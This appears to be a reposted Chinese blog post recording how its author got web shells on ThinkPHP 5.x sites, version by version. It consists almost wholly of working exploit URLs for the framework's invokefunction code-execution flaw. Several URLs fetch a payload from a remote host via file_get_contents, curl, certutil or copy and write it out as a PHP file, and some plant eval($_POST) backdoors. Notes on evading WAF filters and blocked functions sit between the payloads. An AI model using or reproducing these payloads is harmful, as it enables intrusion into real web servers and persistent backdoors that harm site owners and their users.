作者:弹指遮天的小指头 | 来源:互联网 | 2023-06-23 19:12
篇首语:本文由编程笔记#小编为大家整理,主要介绍了ThinkPHP5.x.x各版本实战环境getshell相关的知识,希望对你有一定的参考价值。
#这个文章我之前在t00ls已经分享过了
#内容只是对tp5的实战环境下getshell做的记录,中间遇到的一些小问题的突破,没啥技术含量
-5.1.18
http://www.xxxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]==file_put_contents(‘index_bak2.php‘,file_get_contents(‘https://www.hack.com/xxx.js‘));?>
-5.0.5
waf对eval进行了拦截
禁止了assert函数
对eval函数后面的括号进行了正则过滤
对file_get_contents函数后面的括号进行了正则过滤
http://www.xxxx.com/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=
-5.1.18
所有目录都无写权限,base64函数被拦截
http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_POST[1])
-5.0.18
windows
http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][0]=1
http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo()
使用certutil
http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=passthru&vars[1][0]=cmd /c certutil -urlcache -split -f https://www.hack.com/xxx.js uploads/1.php
由于根目录没写权限,所以写到uploads
-5.0.14
eval(‘‘)和assert(‘‘)被拦截,命令函数被禁止
http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo();
http://www.xxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_GET[1])&1=call_user_func_array("file_put_contents",array("3.php",file_get_contents("https://www.hack.com/xxx.js")));
-5.0.11
http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php
-5.0.14
php7.2
http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=1.txt&vars[1][1]=1
http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]==file_put_contents(‘index111.php‘,file_get_contents(‘https://www.hack.com/xxx.js‘));?>
写进去发现转义了尖括号
通过copy函数
http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]= https://www.hack.com/xxx.js&vars[1][1]=112233.php